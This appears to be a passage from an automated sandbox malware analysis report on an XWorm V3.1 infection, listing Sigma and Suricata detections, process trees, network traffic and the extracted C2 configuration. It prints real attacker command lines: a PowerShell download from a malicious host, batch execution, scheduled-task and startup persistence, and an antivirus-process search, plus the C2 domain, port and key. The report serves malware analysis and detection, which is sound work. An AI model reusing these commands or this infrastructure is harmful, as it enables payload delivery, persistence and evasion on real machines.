'C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.js'" /sc minute /mo 5 /F, ProcessId: 8248, ProcessName: schtasks.exe

Sigma detected: Suspicious Invoke-WebRequest Execution

Source: Process started

Author: Nasreddine Bencherchali (Nextron Systems): Data: Command: powershell -Command "Invoke-WebRequest -Uri 'https://myguyapp.com/f.pdf' -OutFile 'C:\Users\user\AppData\Local\Temp\f.pdf'", CommandLine: powershell -Command "Invoke-WebRequest -Uri 'https://myguyapp.com/f.pdf' -OutFile 'C:\Users\user\AppData\Local\Temp\f.pdf'", CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c powershell -Command "Invoke-WebRequest -Uri 'https://myguyapp.com/f.pdf' -OutFile 'C:\Users\user\AppData\Local\Temp\f.pdf'", ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 7428, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -Command "Invoke-WebRequest -Uri 'https://myguyapp.com/f.pdf' -OutFile 'C:\Users\user\AppData\Local\Temp\f.pdf'", ProcessId: 7480, ProcessName: powershell.exe

Sigma detected: Suspicious MSHTA Child Process

Source: Process started

Author: Michael Haag: Data: Command: "C:\Windows\System32\wscript.exe" "C:\Users\user\AppData\Local\Temp\temp.js", CommandLine: "C:\Windows\System32\wscript.exe" "C:\Users\user\AppData\Local\Temp\temp.js", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: mshta.exe "C:\Users\user\Desktop\c2.hta", ParentImage: C:\Windows\SysWOW64\mshta.exe, ParentProcessId: 7232, ParentProcessName: mshta.exe, ProcessCommandLine: "C:\Windows\System32\wscript.exe" "C:\Users\user\AppData\Local\Temp\temp.js", ProcessId: 7380, ProcessName: wscript.exe

Sigma detected: Suspicious Script Execution From Temp Folder

Source: Process started

Author: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton: Data: Command: "C:\Windows\System32\wscript.exe" "C:\Users\user\AppData\Local\Temp\temp.js", CommandLine: "C:\Windows\System32\wscript.exe" "C:\Users\user\AppData\Local\Temp\temp.js", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: mshta.exe "C:\Users\user\Desktop\c2.hta", ParentImage: C:\Windows\SysWOW64\mshta.exe, ParentProcessId: 7232, ParentProcessName: mshta.exe, ProcessCommandLine: "C:\Windows\System32\wscript.exe" "C:\Users\user\AppData\Local\Temp\temp.js", ProcessId: 7380, ProcessName: wscript.exe

Sigma detected: WScript or CScript Dropper

Source: Process started

Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: "C:\Windows\System32\wscript.exe" "C:\Users\user\AppData\Local\Temp\temp.js", CommandLine: "C:\Windows\System32\wscript.exe" "C:\Users\user\AppData\Local\Temp\temp.js", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: mshta.exe "C:\Users\user\Desktop\c2.hta", ParentImage: C:\Windows\SysWOW64\mshta.exe, ParentProcessId: 7232, ParentProcessName: mshta.exe, ProcessCommandLine: "C:\Windows\System32\wscript.exe" "C:\Users\user\AppData\Local\Temp\temp.js", ProcessId: 7380, ProcessName: wscript.exe

Sigma detected: Execution of Suspicious File Type Extension

Source: Process started

Author: Max Altgelt (Nextron Systems): Data: Command: Carter.pif F, CommandLine: Carter.pif F, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Local\Temp\220239\Carter.pif, NewProcessName: C:\Users\user\AppData\Local\Temp\220239\Carter.pif, OriginalFileName: C:\Users\user\AppData\Local\Temp\220239\Carter.pif, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c copy Phpbb Phpbb.bat & Phpbb.bat, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 8972, ParentProcessName: cmd.exe, ProcessCommandLine: Carter.pif F, ProcessId: 9172, ProcessName: Carter.pif

Sigma detected: Potentially Suspicious Execution Of Regasm/Regsvcs From Uncommon Location

Source: Process started

Author: Nasreddine Bencherchali (Nextron Systems): Data: Command: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exe, CommandLine: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exe, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exe, NewProcessName: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exe, OriginalFileName: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exe, ParentCommandLine: Carter.pif F, ParentImage: C:\Users\user\AppData\Local\Temp\220239\Carter.pif, ParentProcessId: 9172, ParentProcessName: Carter.pif, ProcessCommandLine: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exe, ProcessId: 5928, ProcessName: RegAsm.exe

Sigma detected: PowerShell Web Download

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\cmd.exe" /c powershell -Command "Invoke-WebRequest -Uri 'https://myguyapp.com/f.pdf' -OutFile 'C:\Users\user\AppData\Local\Temp\f.pdf'", CommandLine: "C:\Windows\System32\cmd.exe" /c powershell -Command "Invoke-WebRequest -Uri 'https://myguyapp.com/f.pdf' -OutFile 'C:\Users\user\AppData\Local\Temp\f.pdf'", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Windows\System32\wscript.exe" "C:\Users\user\AppData\Local\Temp\temp.js", ParentImage: C:\Windows\SysWOW64\wscript.exe, ParentProcessId: 7380, ParentProcessName: wscript.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c powershell -Command "Invoke-WebRequest -Uri 'https://myguyapp.com/f.pdf' -OutFile 'C:\Users\user\AppData\Local\Temp\f.pdf'", ProcessId: 7428, ProcessName: cmd.exe

Sigma detected: SCR File Write Event

Source: File created

Author: Christopher Peacock @securepeacock, SCYTHE @scythe_io: Data: EventID: 11, Image: C:\Users\user\AppData\Local\Temp\220239\Carter.pif, ProcessId: 9172, TargetFilename: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scr

Sigma detected: Suspicious Copy From or To System Directory

Source: Process started

Author: Florian Roth (Nextron Systems), Markus Neis, Tim Shelton (HAWK.IO), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\cmd.exe" /c copy Phpbb Phpbb.bat & Phpbb.bat, CommandLine: "C:\Windows\System32\cmd.exe" /c copy Phpbb Phpbb.bat & Phpbb.bat, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\msword\msword.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\msword\msword.exe, ParentProcessId: 8880, ParentProcessName: msword.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c copy Phpbb Phpbb.bat & Phpbb.bat, ProcessId: 8972, ProcessName: cmd.exe

Sigma detected: Suspicious Schtasks From Env Var Folder

Source: Process started

Sigma detected: Suspicious Screensaver Binary File Creation

Source: File created

Author: frack113: Data: EventID: 11, Image: C:\Users\user\AppData\Local\Temp\220239\Carter.pif, ProcessId: 9172, TargetFilename: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scr

Sigma detected: Usage Of Web Request Commands And Cmdlets

Source: Process started

Author: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: "C:\Windows\System32\cmd.exe" /c powershell -Command "Invoke-WebRequest -Uri 'https://myguyapp.com/f.pdf' -OutFile 'C:\Users\user\AppData\Local\Temp\f.pdf'", CommandLine: "C:\Windows\System32\cmd.exe" /c powershell -Command "Invoke-WebRequest -Uri 'https://myguyapp.com/f.pdf' -OutFile 'C:\Users\user\AppData\Local\Temp\f.pdf'", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Windows\System32\wscript.exe" "C:\Users\user\AppData\Local\Temp\temp.js", ParentImage: C:\Windows\SysWOW64\wscript.exe, ParentProcessId: 7380, ParentProcessName: wscript.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c powershell -Command "Invoke-WebRequest -Uri 'https://myguyapp.com/f.pdf' -OutFile 'C:\Users\user\AppData\Local\Temp\f.pdf'", ProcessId: 7428, ProcessName: cmd.exe

Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript

Source: Process started

Sigma detected: Local Accounts Discovery

Source: Process started

Author: Timur Zinniatullin, Daniil Yugoslavskiy, oscd.community: Data: Command: "C:\Windows\System32\cmd.exe" /c mkdir "C:\Users\user\AppData\Local\Temp\msword", CommandLine: "C:\Windows\System32\cmd.exe" /c mkdir "C:\Users\user\AppData\Local\Temp\msword", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Windows\System32\wscript.exe" "C:\Users\user\AppData\Local\Temp\temp.js", ParentImage: C:\Windows\SysWOW64\wscript.exe, ParentProcessId: 7380, ParentProcessName: wscript.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c mkdir "C:\Users\user\AppData\Local\Temp\msword", ProcessId: 8496, ProcessName: cmd.exe

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell -Command "Invoke-WebRequest -Uri 'https://myguyapp.com/f.pdf' -OutFile 'C:\Users\user\AppData\Local\Temp\f.pdf'", CommandLine: powershell -Command "Invoke-WebRequest -Uri 'https://myguyapp.com/f.pdf' -OutFile 'C:\Users\user\AppData\Local\Temp\f.pdf'", CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c powershell -Command "Invoke-WebRequest -Uri 'https://myguyapp.com/f.pdf' -OutFile 'C:\Users\user\AppData\Local\Temp\f.pdf'", ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 7428, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -Command "Invoke-WebRequest -Uri 'https://myguyapp.com/f.pdf' -OutFile 'C:\Users\user\AppData\Local\Temp\f.pdf'", ProcessId: 7480, ProcessName: powershell.exe

Sigma detected: Windows Processes Suspicious Parent Directory

Source: Process started

Author: vburov: Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 620, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 7972, ProcessName: svchost.exe

Data Obfuscation

Sigma detected: Drops script at startup location

Source: File created

Author: Joe Security: Data: EventID: 11, Image: C:\Windows\SysWOW64\cmd.exe, ProcessId: 8268, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\DanielPulse.url

HIPS / PFW / Operating System Protection Evasion

Sigma detected: Search for Antivirus process

Source: Process started

Author: Joe Security: Data: Command: findstr -I "avastui avgui bdservicehost nswscsvc sophoshealth" , CommandLine: findstr -I "avastui avgui bdservicehost nswscsvc sophoshealth" , CommandLine|base64offset|contains: ~), Image: C:\Windows\SysWOW64\findstr.exe, NewProcessName: C:\Windows\SysWOW64\findstr.exe, OriginalFileName: C:\Windows\SysWOW64\findstr.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c copy Phpbb Phpbb.bat & Phpbb.bat, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 8972, ParentProcessName: cmd.exe, ProcessCommandLine: findstr -I "avastui avgui bdservicehost nswscsvc sophoshealth" , ProcessId: 9092, ProcessName: findstr.exe

Suricata Signatures

ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-11T18:06:34.138984+0100	2852870	1	Malware Command and Control Activity Detected	193.26.115.21	7007	192.168.2.4	50021	TCP
2024-12-11T18:07:04.142054+0100	2852870	1	Malware Command and Control Activity Detected	193.26.115.21	7007	192.168.2.4	50021	TCP

ETPRO MALWARE Win32/XWorm CnC PING Command Inbound M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-11T18:06:34.138984+0100	2852874	1	Malware Command and Control Activity Detected	193.26.115.21	7007	192.168.2.4	50021	TCP
2024-12-11T18:07:04.142054+0100	2852874	1	Malware Command and Control Activity Detected	193.26.115.21	7007	192.168.2.4	50021	TCP

ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-11T18:06:22.039016+0100	2855924	1	Malware Command and Control Activity Detected	192.168.2.4	50021	193.26.115.21	7007	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus detection for URL or domain

Source: https://myguyapp.com/msword.zip	Avira URL Cloud: Label: malware
Source: http://myguyapp.com/msword.zip	Avira URL Cloud: Label: malware

Found malware configuration

Source: 00000020.00000003.3491947145.000000000184B000.00000004.00000800.00020000.00000000.sdmp

Malware Configuration Extractor: Xworm {"C2 url": ["me-work.com"], "Port": 7007, "Aes key": "<123456789>", "SPL": "<Xwormmm>", "Install file": "USB.exe", "Version": "XWorm V3.1"}

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 99.0% probability

Sample uses string decryption to hide its real strings

Source: 32.3.Carter.pif.3db2268.1.raw.unpack	String decryptor: me-work.com
Source: 32.3.Carter.pif.3db2268.1.raw.unpack	String decryptor: 7007
Source: 32.3.Carter.pif.3db2268.1.raw.unpack	String decryptor: <123456789>
Source: 32.3.Carter.pif.3db2268.1.raw.unpack	String decryptor: <Xwormmm>
Source: 32.3.Carter.pif.3db2268.1.raw.unpack	String decryptor: USB.exe

Source: unknown	HTTPS traffic detected: 193.26.115.21:443 -> 192.168.2.4:49730 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 193.26.115.21:443 -> 192.168.2.4:49731 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 193.26.115.21:443 -> 192.168.2.4:49735 version: TLS 1.2

Source:	Binary string: RegAsm.pdb source: RegAsm.exe, 0000002C.00000000.3492271583.0000000000902000.00000002.00000001.01000000.00000012.sdmp
Source:	Binary string: RegAsm.pdb4 source: RegAsm.exe, 0000002C.00000000.3492271583.0000000000902000.00000002.00000001.01000000.00000012.sdmp

Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe	Code function: 22_2_004062D5 FindFirstFileW,FindClose,	22_2_004062D5
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe	Code function: 22_2_00402E18 FindFirstFileW,	22_2_00402E18
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe	Code function: 22_2_00406C9B DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,	22_2_00406C9B
Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pif	Code function: 32_2_00C54005 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	32_2_00C54005
Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pif	Code function: 32_2_00C5494A GetFileAttributesW,FindFirstFileW,FindClose,	32_2_00C5494A
Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pif	Code function: 32_2_00C53CE2 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	32_2_00C53CE2
Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pif	Code function: 32_2_00C5C2FF FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,	32_2_00C5C2FF
Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pif	Code function: 32_2_00C5CD9F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,	32_2_00C5CD9F
Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pif	Code function: 32_2_00C5CD14 FindFirstFileW,FindClose,	32_2_00C5CD14
Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pif	Code function: 32_2_00C5F5D8 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	32_2_00C5F5D8
Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pif	Code function: 32_2_00C5F735 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	32_2_00C5F735
Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pif	Code function: 32_2_00C5FA36 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,	32_2_00C5FA36
Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scr	Code function: 40_2_00FB4005 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	40_2_00FB4005
Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scr	Code function: 40_2_00FBC2FF FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,	40_2_00FBC2FF
Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scr	Code function: 40_2_00FB494A GetFileAttributesW,FindFirstFileW,FindClose,	40_2_00FB494A
Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scr	Code function: 40_2_00FBCD9F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,	40_2_00FBCD9F
Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scr	Code function: 40_2_00FBCD14 FindFirstFileW,FindClose,	40_2_00FBCD14
Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scr	Code function: 40_2_00FBF5D8 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	40_2_00FBF5D8
Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scr	Code function: 40_2_00FBF735 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	40_2_00FBF735
Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scr	Code function: 40_2_00FBFA36 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,	40_2_00FBFA36
Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scr	Code function: 40_2_00FB3CE2 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	40_2_00FB3CE2
Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scr	Code function: 42_2_00F24005 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	42_2_00F24005
Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scr	Code function: 42_2_00F2C2FF FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,	42_2_00F2C2FF
Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scr	Code function: 42_2_00F2494A GetFileAttributesW,FindFirstFileW,FindClose,	42_2_00F2494A
Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scr	Code function: 42_2_00F2CD9F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,	42_2_00F2CD9F
Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scr	Code function: 42_2_00F2CD14 FindFirstFileW,FindClose,	42_2_00F2CD14
Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scr	Code function: 42_2_00F2F5D8 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	42_2_00F2F5D8
Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scr	Code function: 42_2_00F2F735 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	42_2_00F2F735
Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scr	Code function: 42_2_00F2FA36 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,	42_2_00F2FA36
Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scr	Code function: 42_2_00F23CE2 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	42_2_00F23CE2

Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\Temp\
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\Temp\220239\
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\Temp\220239
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\

Software Vulnerabilities

Suspicious execution chain found

Source: C:\Windows\SysWOW64\wscript.exe

Child: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2855924 - Severity 1 - ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound : 192.168.2.4:50021 -> 193.26.115.21:7007
Source: Network traffic	Suricata IDS: 2852870 - Severity 1 - ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes : 193.26.115.21:7007 -> 192.168.2.4:50021
Source: Network traffic	Suricata IDS: 2852874 - Severity 1 - ETPRO MALWARE Win32/XWorm CnC PING Command Inbound M2 : 193.26.115.21:7007 -> 192.168.2.4:50021

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

URLs: me-work.com

Yara detected Generic Downloader

Source: Yara match

File source: 32.3.Carter.pif.3db2268.1.raw.unpack, type: UNPACKEDPE

Source: global traffic

TCP traffic: 192.168.2.4:50021 -> 193.26.115.21:7007

Source: Joe Sandbox View

ASN Name: QUICKPACKETUS QUICKPACKETUS

Source: Joe Sandbox View	JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: Joe Sandbox View	JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19

Source: global traffic	HTTP traffic detected: GET /bo.js HTTP/1.1Accept: /Accept-Language: en-chAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: myguyapp.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /f.pdf HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: myguyapp.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /msword.zip HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: myguyapp.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /msword.zip HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: myguyapp.comConnection: Keep-Alive

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pif

Code function: 32_2_00C629BA InternetReadFile,InternetQueryDataAvailable,InternetReadFile,

32_2_00C629BA

Source: global traffic	HTTP traffic detected: GET /bo.js HTTP/1.1Accept: /Accept-Language: en-chAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: myguyapp.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /f.pdf HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: myguyapp.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /msword.zip HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: myguyapp.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /msword.zip HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: myguyapp.comConnection: Keep-Alive

Source: global traffic	DNS traffic detected: DNS query: myguyapp.com
Source: global traffic	DNS traffic detected: DNS query: x1.i.lencr.org
Source: global traffic	DNS traffic detected: DNS query: dwLscOsEZmpbOxr.dwLscOsEZmpbOxr
Source: global traffic	DNS traffic detected: DNS query: me-work.com

Source: msword.exe.21.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: msword.exe.21.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
Source: msword.exe.21.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: msword.exe.21.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: msword.exe, 00000016.00000003.2180955166.00000000029A4000.00000004.00000020.00020000.00000000.sdmp, Carter.pif, 00000020.00000003.3546333240.0000000003DB2000.00000004.00000800.00020000.00000000.sdmp, Carter.pif, 00000020.00000003.2212981641.000000000406B000.00000004.00000800.00020000.00000000.sdmp, Carter.pif, 00000020.00000002.4145541931.0000000003DBE000.00000004.00000800.00020000.00000000.sdmp, DanielPulse.scr.32.dr	String found in binary or memory: http://crl.globalsign.com/gs/gstimestampingsha2g2.crl0
